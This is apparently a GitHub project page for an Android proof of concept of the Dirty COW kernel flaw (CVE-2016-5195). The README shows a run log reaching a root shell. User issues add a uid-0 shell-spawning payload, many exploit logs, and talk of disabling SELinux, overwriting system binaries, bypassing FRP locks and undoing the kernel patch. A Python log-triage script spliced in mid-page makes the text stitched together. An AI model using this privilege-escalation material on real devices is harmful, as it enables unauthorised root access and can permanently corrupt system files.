
cve-2016-5195's Introduction

CVE-2016-5195

CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android

This repository demonstrates the vulnerability on vulnerable Android devices attached via ADB. It does not disable SELinux (see #9) or install superuser on the device.


$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/user/dev/git/exploits/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/user/dev/git/exploits/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (17944) differ

[*] size 5544
[*] mmap 0xb536b000
[*] currently 0xb536b000=464c457f
[*] madvise = 0xb536b000 5544
[*] madvise = 0 0
[*] /proc/self/mem 5544 1
[*] exploited 0xb536b000=464c457f
adb shell /system/bin/run-as
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
/system/bin/sh: can't find tty fd: No such device or address
/system/bin/sh: warning: won't have full job control
shamu:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
shamu:/ # 

cve-2016-5195's People

Contributors

0x454447415244, anwarmohamed, droidvoider, f0k, manouchehri, saaramar, timwr, toxeus


cve-2016-5195's Issues

Issues on Kindle Fire 5thgen (KFFOWI)

My device hard-reboots as soon as the exploit finishes, leading to the following output. Any suggestions?

[bithakr@localhost CVE-2016-5195]$ make run
make: *** No rule to make target 'run'.  Stop.
[bithakr@localhost CVE-2016-5195]$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make[1]: Entering directory '/home/bithakr/dev/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/bithakr/dev/CVE-2016-5195'
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
[100%] /data/local/tmp/dirtycow
adb push libs/armeabi/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6fffffff arg 0x1
warning: new file size (13776) and file old size (9444) differ

size 13776


[*] mmap 0xb6f2c000
[*] exploit (patch)
[*] currently 0xb6f2c000=464c457f
[*] madvise = 0xb6f2c000 13776
[*] madvise = 0 1048576
adb shell /system/bin/run-as
error: no devices/emulators found
make: *** [Makefile:14: root] Error 1

Can you make APK version?

Hi guys! Is it possible to make the PoC an Android Studio project to build an APK?
If anyone starts one or has a link, please share!

Problem with Run-as

Hello, I've tried to exploit root access with dirtycow and I've modified the file run-as.c to launch a system command with the function system(), but it doesn't work. Here is the code:

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strerror (missing from the original paste) */
#include <errno.h>    /* errno (missing from the original paste) */
#include <sys/capability.h>

int main(int argc, char **argv)
{
  struct __user_cap_header_struct capheader;
  struct __user_cap_data_struct capdata[2];

  /* Ask for CAP_SETUID and CAP_SETGID in the effective and permitted sets. */
  memset(&capheader, 0, sizeof(capheader));
  memset(&capdata, 0, sizeof(capdata));
  capheader.version = _LINUX_CAPABILITY_VERSION_3;
  capdata[CAP_TO_INDEX(CAP_SETUID)].effective |= CAP_TO_MASK(CAP_SETUID);
  capdata[CAP_TO_INDEX(CAP_SETGID)].effective |= CAP_TO_MASK(CAP_SETGID);
  capdata[CAP_TO_INDEX(CAP_SETUID)].permitted |= CAP_TO_MASK(CAP_SETUID);
  capdata[CAP_TO_INDEX(CAP_SETGID)].permitted |= CAP_TO_MASK(CAP_SETGID);
  if (capset(&capheader, &capdata[0]) < 0) {
    printf("Could not set capabilities: %s\n", strerror(errno));
  }

  /* Switch real, effective and saved gid/uid to 0. */
  if (setresgid(0,0,0) || setresuid(0,0,0)) {
    printf("setresgid/setresuid failed\n");
  }

  if (getuid() != 0) {
    printf("Failed to obtain root access. \n");
    exit(1);
  }
  printf("SUCESSFULL!!\n");
  system("/system/bin/id");
  system("/system/bin/sh");
  return 0;
}

Here is the output:

shell@HWLYO-L6735:/data/local/tmp $ run-as
WARNING: linker: run-as: unused DT entry: type 0x6ffffffe arg 0x53c
WARNING: linker: run-as: unused DT entry: type 0x6fffffff arg 0x1
SUCESSFULL!!

Do you have an idea ? Thank you in advance for your answer.

error permission denied

Any time I try to run something with run-as I get "permission denied". My phone is an HTC Desire 530 from Verizon with the bootloader still locked (fuck Verizon).

Error 127

root@kali:~/CVE-2016-5195# make
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make: ndk-build: Команда не найдена *Command not found*
Makefile:5: ошибка выполнения рецепта для цели *Error with starting recipe for target* «build»
make: *** [build] Ошибка*Error* 127

(sorry my english)))

could not open /system/bin/run-as

Code generating info:

	int f=open(argv[1],O_RDONLY);
	if (f == -1) {
		LOGV("could not open %s", argv[1]);
		return 0;
	}
	if (fstat(f,&st) == -1) {
		LOGV("could not open %s", argv[1]);
		return 0;
	}

Do You know what can be the reason ?

shell@m0:/system/bin $ ls -l run-as
-rwxr-x--- root     shell        9432 2014-01-25 09:03 run-as

Samsung Galaxy S3

Caution: Dirtycow can make persistent modifications to read-only files

I have read [ https://forum.xda-developers.com/showpost.php?p=70311089&postcount=44 ] that one xda user used dirtycow to modify the file /system/etc/fonts.xml and the modifications were still there after a reboot. His phone is a "Moto G 2014 with stock Marshmallow".

I encountered this with a Samsung Xcover 3 (gf388). I don't know how to reproduce it, but now I have /system/bin/wpa_supplicant permanently* broken with random data (I was just testing dirtycow and wpa_supplicant was about the biggest binary there). I haven't yet got a root shell and the /system partition has always been mounted read-only.

[EDIT]
Android 4.3
Linux version 3.0.31-2429075 (dpi@DELL135) (gcc version 4.4.3 (GCC) ) #1 SMP PREEMPT Wed Apr 30 18:49:01 KST 2014
[ro.build.date]: [Wed Apr 30 18:55:06 KST 2014]
[ro.build.description]: [m0xx-user 4.3 JSS15J I9300XXUGND5 release-keys]
[ro.build.fingerprint]: [samsung/m0xx/m0:4.3/JSS15J/I9300XXUGND5:user/release-keys]
[ro.build.version.release]: [4.3]

*) until reflash

So beware: Dirtycow will eat your children!

Problem on Android 2.2.2

$ make run
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
[1] Segmentation fault /data/local/tmp/...
adb shell /system/bin/run-as
Usage: run-as <package-name> <command> [<args>]

Device is a ZTE Racer II with Android 2.2.2. Wikipedia link: https://en.wikipedia.org/wiki/ZTE_Racer_II

I think the shell may be the problem, as it's extremely bad (arrow-up doesn't work and everything else is also bad).

Running the command in a shell manually:

$ /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as
[1] + Stopped (signal) /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as
$ # i pressed enter here
[1] Segmentation fault /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as

HELP: Note 5 AT&T Nov. Sec. Patch. (I executed dirtycow, have photo evidence, but how?)

dirtycow always says it works for me and quickly but it has only worked once. I am passionately trying to rediscover how I did it. (I patched /system/build.prop and it showed in recovery!)

2 Possibilities of how:
First Possibility:
I had just got done flashing the wrong files in Download Mode, repeatedly getting fails. I tried rooting files that almost finished, rooting files for 5.11 that did finish but didn't boot. Finally I put just the AP file back (excluding BL+CP+CSC files) and it booted, then I executed.. (did I crash the November 1 2016 update, or get at the kernel somehow on a locked bootloader?)

Second Possibility:
I accidentally deleted the directory containing the version I used. Maybe I found a version for Samsung or compiled it differently?? (I was trying tons of dirtycow compilations)
CVE-2016-5195 = SVE-2016-7504 (double patched?)
Google says the fix is called CVE-2016-5195, patched 11-05-2016; however, my security patch level is Nov 1st, 2016. The Samsung SVE-2016-7504 is stated to be included in November's patches and there are 14 patches in that set. AT&T N920AUCS4CPK1 has a note about 14 patches from Samsung, the exact number. (So I seem to be patched if I follow the logic, even though Google responded on 11/05/2016, but I dunno how to confirm what's in this Nov 1 2016 security patch in the PK1 firmware.)

Samsung Note 5 7420Exynos, here's what I'm building with.

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23

Android.mk:
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_SRC_FILES := \
  dirtycow.c
LOCAL_MODULE := dirtycow
LOCAL_LDFLAGS   += -llog
LOCAL_CFLAGS    += -DDEBUG

(I try these flags also, separately.. I am learning C on Android, I like it.)

LOCAL_CFLAGS    += -fPIE
LOCAL_LDFLAGS   += -fPIE -pie

include $(BUILD_EXECUTABLE)

Build Error

./run-as.c:3:10: fatal error: 'sys/capability.h' file not found
#include <sys/capability.h>
         ^
1 error generated.

My test results

I've so far tested the PoC on two devices:

Sony Xperia Z2 Tablet (rooted, running Cyanogenmod [11 i think]) - Android 4.4.4 :
Status: Worked perfectly - overwrote run-as and was able to spawn a root shell, meaning no SELinux was present.

[*] mmap 0xb6ee0000
[*] exploit (patch)
[*] currently 0xb6ee0000=464c457f
[*] madvise = 0xb6ee0000 9680
[*] madvise = 0 1048576
[*] /proc/self/mem 1560281088 1048576
[*] exploited 0xb6ee0000=464c457f

Sony Xperia Z5 Compact (stock firmware, non-rooted) - Android 6.0.1 :
Status: Not working - run-as was not overwritten. Tried to increase the LOOP define from 0x100000 to 0x10000000 as I thought maybe it needs more time to trigger the race condition, but still after several minutes there was no success and run-as remained unchanged.

[*] mmap 0xf6fcd000
[*] exploit (patch)
[*] currently 0xf6fcd000=464c457f
[*] madvise = 0xf6fcd000 14192
[*] madvise = 0 268435456
[*] /proc/self/mem -268435456 268435456
[*] exploited 0xf6fcd000=464c457f

Will later check also on Samsung S5 and post the results here. Let me know if you need me to give you any more info.

How do you spawn a shell after exploit?

I've tried execlp, system, even executing chmod(const char *pathname, mode_t mode) in the code, but nothing seems to work.

I do get getuid() == 0, but I can't do anything with that privilege.

EDIT: My device does NOT have /system/bin/run-as with setuid and I have seen NO device that has it set.

Mention in the README that the source size must be <= the destination size

I couldn't figure out what I was doing wrong, then I realized that the exploit will trim the source's file size to the destination's current file size. So, if the source is 30 bytes, but the destination is 20 bytes, then only the first 20 bytes of the source will get copied.

IMO it's worth adding this to the README somewhere.

RUN, get problems, need help!!!

adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6ffffffe arg 0x5f8
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6fffffff arg 0x1
warning: new file size (13708) and file old size (9440) differ

size 13708

[*] mmap 0xb63fc000
[*] exploit (patch)
[*] currently 0xb63fc000=464c457f
[*] madvise = 0xb63fc000 13708
[*] madvise = 0 1048576
[*] /proc/self/mem 0 1048576
[*] exploited 0xb63fc000=464c457f
adb shell /system/bin/run-as
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x4fc
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x1
running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed
uid 2000

No matter what kind of argument I give to run-as, it just won't execute as root

So after compiling dirtycow and running it on a Galaxy J5 on 5.1.1 Lollipop (SEAndroid enforced) http://imgur.com/a/9PRAl, it won't do anything; rather, it tells me that it is running as uid 200 and uid 0, that's all. I searched a lot about this issue but was not able to get any detailed information about it. My first thought on why it's not working was about SEAndroid being enforced, but after asking JCase on Twitter, he said that the issue can't be SEAndroid. As for dirtycow itself, it seems to exploit successfully since the run-as binary in /system/bin has changed. I have to mention that my main goal is to spawn a root shell, but so far I can't even run a single command as root. Really appreciate dirtycow, glad if someone can help me out.

armeabi-v7a failing due to xattr.h

Firstly, nice work.

Second - when compiling, run-as fails for armeabi-v7a due to not having xattr. I understand this is a libattr file, but after installing the normal and dev packages I still get the error.

Does anybody know the correct package for a copy of xattr.h? I tried a few online without success.

System: Linux Mint x64

Readable file with a "size" of 0.

I'm trying to dirtycow /sys/fs/selinux/enforce to disable SELinux, but since the filesystem describes it as having a size of 0 bytes, it fails with this log (even though it's entirely readable and has a size of 1 byte):

$ ./dirtycow /sys/fs/selinux/enforce ./enforce
warning: new file size (1) and file old size (0) differ

size 1


mmap

Or will it never work like that?
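The PoC output quoted in the README and in the posts above carries enough to tell a genuine negative result from a misused harness: a source larger than the destination gets trimmed, a zero-size /sys target fails after mmap, and a replacement run-as can run yet end at uid 2000. Added example, not code from this repository: a Python reader for the PoC's own log lines that performs that triage, useful when checking lab devices for this vulnerability. SAMPLE_LOG is constructed from line formats quoted on this page; the finding codes are this example's own naming.

```python
"""Triage for the output of the CVE-2016-5195 Android PoC (dcow/dirtycow + run-as).

Added example, not part of this repository. It reads the PoC's own log lines,
in the formats quoted in the README and the issue reports on this page, and
separates a genuine "not vulnerable" result from a misused harness.
"""
import re

# Constructed sample: line formats quoted on this page, stitched together
# from a run whose replacement run-as ended up at uid 2000.
SAMPLE_LOG = """\
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (13708) and file old size (9440) differ
[*] mmap 0xb63fc000
[*] exploit (patch)
[*] currently 0xb63fc000=464c457f
[*] madvise = 0xb63fc000 13708
[*] madvise = 0 1048576
[*] /proc/self/mem 0 1048576
[*] exploited 0xb63fc000=464c457f
adb shell /system/bin/run-as
running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed
uid 2000
"""

# Both wordings of the size warning that appear on this page (older and newer builds).
SIZE_RE = re.compile(r"warning: new file size \((\d+)\) and "
                     r"(?:file old|destination file) size \((\d+)\) differ")
# First 32-bit word of the mapping, printed before ("currently") and after ("exploited").
WORD_RE = re.compile(r"\[\*\] (currently|exploited) 0x[0-9a-f]+=([0-9a-f]{8})")
# The bare "uid N" line printed last by the replacement run-as.
UID_RE = re.compile(r"^uid (\d+)$", re.M)


def parse_poc_log(text):
    """Extract what the PoC prints: sizes, first word before/after, final uid."""
    info = {"new_size": None, "old_size": None, "before": None, "after": None,
            "setuid_failed": "setresgid/setresuid failed" in text,
            "final_uid": None}
    m = SIZE_RE.search(text)
    if m:
        info["new_size"], info["old_size"] = int(m.group(1)), int(m.group(2))
    for key, word in WORD_RE.findall(text):
        info["before" if key == "currently" else "after"] = word
    uids = UID_RE.findall(text)
    if uids:
        info["final_uid"] = int(uids[-1])
    return info


def triage(text):
    """Return (code, explanation) findings for one PoC run, in the order checked."""
    info = parse_poc_log(text)
    findings = []
    new, old = info["new_size"], info["old_size"]
    if new is not None and old == 0:
        findings.append(("ZERO_SIZE_TARGET",
                         "destination reports size 0 (sysfs/procfs style file); the PoC "
                         "uses that size and fails after mmap, as in the selinux/enforce report"))
    elif new is not None and new > old:
        findings.append(("TRUNCATED",
                         f"source ({new} bytes) is larger than destination ({old} bytes); "
                         f"only the first {old} bytes are copied, dropping {new - old}"))
    before, after = info["before"], info["after"]
    if before and after:
        if before != after:
            findings.append(("FIRST_WORD_CHANGED", f"{before} -> {after}"))
        else:
            findings.append(("FIRST_WORD_UNCHANGED",
                             "identical first word is inconclusive (two ELF files both start "
                             "with 464c457f); compare a checksum of the target instead"))
    if info["setuid_failed"]:
        findings.append(("SETUID_FAILED",
                         "replacement ran but capset/setresuid failed, so it is not "
                         "running with uid-changing capabilities"))
    if info["final_uid"] == 0:
        findings.append(("ROOT", "device is exploitable: final uid 0"))
    elif info["final_uid"] is not None:
        findings.append(("NOT_ROOT", f"final uid {info['final_uid']}"))
    return findings


if __name__ == "__main__":
    for code, why in triage(SAMPLE_LOG):
        print(f"{code:22s} {why}")
```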

Android TV Shell Hang

Issue:
After successfully exploiting, I am taken to the shell but if I press enter (doesn't matter what the command is), it kind of hangs. You could press the enter key as much as you want and it would go to the next line each time but it looks (visually) as if it's still waiting for output infinitely with the blinking cursor. Using CTRL+C is one way of getting out of the entire thing. I had tested the reboot command but that did nothing whatsoever.
The actual unit was responsive the entire time. So nothing like kernel panics ended up happening (unlike half of the time with KingRoot).

System information:

Model: 40PUT6400/12 - Philips - Developed by TP Vision
Product ID: QM152E
Security Patch Date: 2016-07-01
Android Version: 5.1.1 (22 SDK)
CPU: Cortex-A17 (armeabi-v7a, 32 bit)
Kernel Version: 3.10.27 (build_ci@inblrlx047) (gcc version 4.8.2 20131014 (prerelease) (Linaro GCC 4.8-2013.10)) #1 SMP PREEMPT Fri Oct 7 11:45:11 IST 2016

MAKE TEST:

user@hostname:~/Desktop/CVE-2016-5195-master$ make test
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/user/Desktop/CVE-2016-5195-master'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/user/Desktop/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
100 KB/s (13784 bytes in 0.134s)
adb push test.sh /data/local/tmp/test.sh
11 KB/s (367 bytes in 0.031s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2016-12-30 19:22 test
-rwxrwxrwx shell    shell         367 2016-12-19 14:06 test.sh
-r--r--r-- shell    shell          18 2016-12-30 19:22 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x630
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0xb6eda000
[*] currently 0xb6eda000=72756f79
[*] madvise = 0xb6eda000 18
[*] madvise = 0 59449
[*] /proc/self/mem 93150 5175
[*] exploited 0xb6eda000=6e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121  vulnerable!!!!!!
00000010: 210d 0a                                  !..

MAKE ROOT:

user@hostname:~/Desktop/CVE-2016-5195-master$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/user/Desktop/CVE-2016-5195-master'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/user/Desktop/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
111 KB/s (13784 bytes in 0.121s)
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
54 KB/s (5544 bytes in 0.100s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x630
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (9444) differ

[*] size 5544
[*] mmap 0xb6e7d000
[*] currently 0xb6e7d000=464c457f
[*] madvise = 0xb6e7d000 5544
[*] madvise = 0 460
[*] /proc/self/mem 205128 37
[*] exploited 0xb6e7d000=464c457f
adb shell /system/bin/run-as
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x63c
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x2
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
root@philips_MT5593FHT_EU:/ #

File size issue (0xFFF bytes)

Hello,

For big files, I realized that I can't replace more than 0xFFF bytes of the original file content.
Any ideas?

Thanks

Dirtycowing recovery on Samsung, what will happen to KNOX?

I have a Samsung phone with Android 6.0.1, and it still has its Knox warranty, and my goal is to keep KNOX.

I just checked that dirtycow will work on my phone.
I also found that there are a couple of /system/bin/fsck.* with read permission. I'm pretty sure they are executed as root and it seems I'm able to trigger them at will (sd-card or usb-otg). And they are pretty big. Perfect targets then.

BUT my question: What to do next? For my model there is twrp available. So could I do:
dd if=twrp.img of=/dev/block/platform/by-name/RECOVERY

What will KNOX say about that? Then I could boot to twrp and install superSu.zip, and what will KNOX say about that?

My phone has a (developer) option for allowing/disallowing flashing. I think flashing must be enabled. Not because of dd, but for booting with a non-Samsung recovery image.

(I think that after using dirtycow I can't just install superSu.apk because of the dirty cache, hence changing recovery.)

header has wrong CVE

"CVE-2016-5915 (dirtycow/dirtyc0w) proof of concept for Android"

Should be 2016-5195 as the project is named.

setresgid/setresuid failed; looking for some help to get the exploit working

Hey guys, looking for a bit of direction for getting this exploit working on my device. It's a Samsung Galaxy E 7" Lite, running at android SDK 19 (based on adb shell getprop ro.build.version.sdk).

I've attempted to build for APP_PLATFORM=android-19 and couldn't compile due to missing sys/capabilities.h headers. I've also attempted to increase the loop size without success.

I've pasted the output from my initial trial below. Interested in messing around with the code but need some direction as to what is potentially going wrong with the exploit.

Thanks!

→ make root
../ndk/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make[1]: Entering directory `~/Desktop/android_root/CVE-2016-5195'
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Compile thumb  : run-as <= run-as.c
[armeabi] Executable     : run-as
[armeabi] Install        : run-as => libs/armeabi/run-as
make[1]: Leaving directory `~/Desktop/android_root/CVE-2016-5195'
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
1981 KB/s (13516 bytes in 0.006s)
adb push libs/armeabi/run-as /data/local/tmp/run-as
1157 KB/s (9420 bytes in 0.007s)
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (9420) and file old size (9440) differ

size 9440


[*] mmap 0xb6ef6000
[*] exploit (patch)
[*] currently 0xb6ef6000=464c457f
[*] madvise = 0xb6ef6000 9440
[*] madvise = 0 1048576
[*] /proc/self/mem 1308622848 1048576
[*] exploited 0xb6ef6000=464c457f
adb shell /system/bin/run-as
running as uid 2000
setresgid/setresuid failed
uid 2000

Possibility for unpatching latest kernel patches?

Let me just start by saying I really don't understand the extent of what my question really entails. As much as I'd like to fully understand the inner workings of this exploit I really just haven't been able to grasp it just yet. So just go easy in your potential response...

I've found many interesting ways to use the exploits you all have put together, specifically this one the most. I have a few videos showing how to use this on FRP locked devices on youtube that are worth a watch.

I found the page that discusses how this exploit has been patched in the more recent updates https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619.

I'm wondering what the possibilities are for being able to "un-patch" the fixes that break dirtycow's functionality. I realize this is probably a very broad question to be asking but just from looking at the source for the patched updates it really doesn't look like very much was altered. Future thanks to anyone that can add some info on the topic.

Dirtycow not exploiting Samsung Galaxy S2

Samsung Galaxy S2, running kernel 3.0.31 and Android-4.1.2.
Dirtycow not triggering.

Running dirtycow gives
[*] exploited 0x402d1000=464c457f
but targeted file is not changing.

I have tried a couple of things:
Different toolchain: android-ndk-r12b / android-ndk-r13b
Different platform: APP_PLATFORM=android-21 / APP_PLATFORM=android-10
Different loop: #define LOOP 0x100000 / 0x10000 / 0x1000000
Different pagesize: #define PAGE_SIZE 4096 / 2048

What can be the issue? What else can I do?

Full log:

shell@android:/data/local/tmp $ ./busybox md5sum /default.prop default.prop    
28bc55d4056c4e75e38bc570c579b6a0  /default.prop
e3e8cce6dc9070cfb3fc3e5403fe40f4  default.prop
shell@android:/data/local/tmp $ ./dirtycow /default.prop default.prop          
warning: new file size (6450) and file old size (116) differ

size 6450


[*] mmap 0x400e7000
[*] exploit (patch)
[*] currently 0x400e7000=20230a23
[*] madvise = 0x400e7000 6450
[*] /proc/self/mem -1048576 1048576
[*] madvise = 0 1048576
[*] exploited 0x400e7000=20230a23
shell@android:/data/local/tmp $ ./busybox md5sum /default.prop                 
28bc55d4056c4e75e38bc570c579b6a0  /default.prop

run-as doesn't work correctly

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell "/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as"
warning: new file size (13776) and file old size (17920) differ

size 17920

[*] mmap 0xb6d3b000
[*] exploit (patch)
[*] currently 0xb6d3b000=464c457f
[*] madvise = 0xb6d3b000 17920
[*] madvise = 0 1048576
[*] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6d3b000=464c457f

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell
shell@R1_HD:/ $ run-as
running as uid 2000
uid 0
shell@R1_HD:/ $ run-as id
running as uid 2000
uid 0
shell@R1_HD:/ $ exit

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as id
running as uid 2000
uid 0

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as ls
running as uid 2000
uid 0

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as ls /dev
running as uid 2000
uid 0

Root Shell With permission denied

Hello, I've successfully spawned a root shell but I can't run any root commands. Here is an example:

root@HWLYO-L6735:/ # id
uid=0(root) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
root@HWLYO-L6735:/ # mount -o remount,rw /system 
mount: Permission denied
255|root@HWLYO-L6735:/ # 

Can you help me?

How can I root with this?

I wanted to root my phone (Android 5.1.1) and install SuperSU, but KingRoot etc. didn't work. How can I root my phone using this? Must I have a machine with Linux or Windows to do so?

run-as: Package '<insert any package name here>' is unknown

